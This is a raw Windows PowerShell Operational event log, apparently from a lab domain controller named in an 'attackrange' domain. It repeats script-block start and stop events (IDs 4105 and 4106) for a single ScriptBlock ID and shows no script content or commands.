LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476415
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476414
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476413
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476412
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476411
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476410
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476409
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476408
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476407
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476406
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476405
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476404
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476403
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476402
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476401
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476400
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476399
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476398
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476397
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476396
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476395
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476394
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476393
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476392
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476391
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476390
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476389
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476388
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476387
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476386
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476385
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476384
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476383
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476382
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476381
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476380
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476379
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476378
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476377
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476376
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476375
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476374
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476373
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476372
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476371
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476370
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476369
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476368
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476367
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476366
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476365
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476364
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476363
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476362
Keywords=None
